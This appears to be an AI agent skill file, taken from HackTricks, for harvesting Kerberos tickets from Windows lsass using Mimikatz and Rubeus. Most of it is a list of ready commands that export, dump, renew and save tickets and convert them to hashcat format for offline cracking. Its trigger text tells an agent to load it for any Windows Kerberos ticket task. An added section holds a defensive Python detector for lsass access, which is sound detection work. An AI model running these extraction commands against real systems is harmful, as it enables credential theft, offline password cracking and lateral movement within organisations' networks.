Hacktricks-skills kerberos-ticket-harvesting

How to harvest Kerberos tickets from Windows systems using Mimikatz and Rubeus. Use this skill whenever you need to extract, dump, triage, renew, or convert Kerberos tickets from Windows environments during security assessments, penetration testing, or red team operations. Trigger this skill for any Windows Kerberos ticket manipulation tasks, including lsass memory extraction, ticket export, and offline cracking preparation.

Install (from source): clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
Manifest: skills/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows/SKILL.MD

Source content

Kerberos Ticket Harvesting from Windows

This skill covers extracting and manipulating Kerberos tickets from Windows systems using industry-standard tools like Mimikatz and Rubeus.

Background

Tickets in Windows are managed and stored by the lsass (Local Security Authority Subsystem Service) process, responsible for handling security policies. To extract these tickets, it's necessary to interface with the lsass process. A non-administrative user can only access their own tickets, while an administrator has the privilege to extract all tickets on the system.
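Because extraction has to go through lsass, a defender can key on processes that open lsass.exe for memory reads. The following Python is an added example (not part of the HackTricks skill or of either tool) that flags Sysmon Event ID 10 ProcessAccess records where a non-allowlisted process obtained PROCESS_VM_READ on lsass.exe; the allowlist and the NDJSON sample events are constructed assumptions, not real telemetry.

```python
import json

# Sysmon Event ID 10 reports the access mask the source process obtained
# on the target. Reading lsass memory requires PROCESS_VM_READ (0x0010);
# commonly reported masks such as 0x1010 and 0x1410 both include this bit.
PROCESS_VM_READ = 0x0010

# Hypothetical allowlist of processes that legitimately open lsass with
# read access. Tune this to your own estate (e.g. your EDR agent).
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}


def is_suspicious_lsass_access(event: dict) -> bool:
    """True when a non-allowlisted process opened lsass.exe with VM_READ."""
    target = event.get("TargetImage", "").lower()
    if not target.endswith(r"\lsass.exe"):
        return False
    source = event.get("SourceImage", "").lower()
    if source in ALLOWLIST:
        return False
    try:
        mask = int(event.get("GrantedAccess", "0"), 16)
    except ValueError:
        return False  # malformed mask: ignore rather than crash the scan
    return bool(mask & PROCESS_VM_READ)


def scan(lines):
    """Return (SourceImage, GrantedAccess) for each suspicious Event ID 10 line."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        if ev.get("EventID") == 10 and is_suspicious_lsass_access(ev):
            hits.append((ev["SourceImage"], ev["GrantedAccess"]))
    return hits


# Constructed sample NDJSON events (not real telemetry).
SAMPLE_LOG = r"""
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\csrss.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"}
{"EventID": 10, "SourceImage": "C:\\Users\\jdoe\\Downloads\\m.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\taskmgr.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1400"}
{"EventID": 10, "SourceImage": "C:\\Windows\\explorer.exe", "TargetImage": "C:\\Windows\\System32\\notepad.exe", "GrantedAccess": "0x1010"}
"""

if __name__ == "__main__":
    for source, mask in scan(SAMPLE_LOG.splitlines()):
        print(f"suspicious lsass access: {source} mask={mask}")
```

Rubeus triage and dump go through the LSA ticket-cache API rather than reading lsass memory, so they do not produce Event ID 10; this rule covers the Mimikatz sekurlsa path only.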

Tools Overview

Mimikatz

Mimikatz is a versatile tool that can interact with Windows security. It's used not only for extracting tickets but also for various other security-related operations.

Extract tickets using Mimikatz:

sekurlsa::tickets /export

Rubeus

Rubeus is a tool specifically tailored for Kerberos interaction and manipulation. It's used for ticket extraction and handling, as well as other Kerberos-related activities.

Dump all tickets:

.\Rubeus.exe dump

Save a ticket to file:

[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

List all tickets:

.\Rubeus.exe triage

Dump a specific ticket by LUID:

.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap

Save the specific ticket:

[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

Renew a ticket:

.\Rubeus.exe renew /ticket:<BASE64_TICKET>

Convert a ticket to hashcat format for offline cracking:

.\Rubeus.exe hash /ticket:<BASE64_TICKET>

Usage Notes

  • Replace <BASE64_TICKET> with the actual Base64-encoded ticket string
  • Replace <luid> with the actual Logon ID from the triage output
  • Ensure you have appropriate privileges (administrative access extracts all tickets; non-admin users can only access their own)
  • These tools provide extensive functionality for managing tickets and interacting with the security mechanisms of Windows
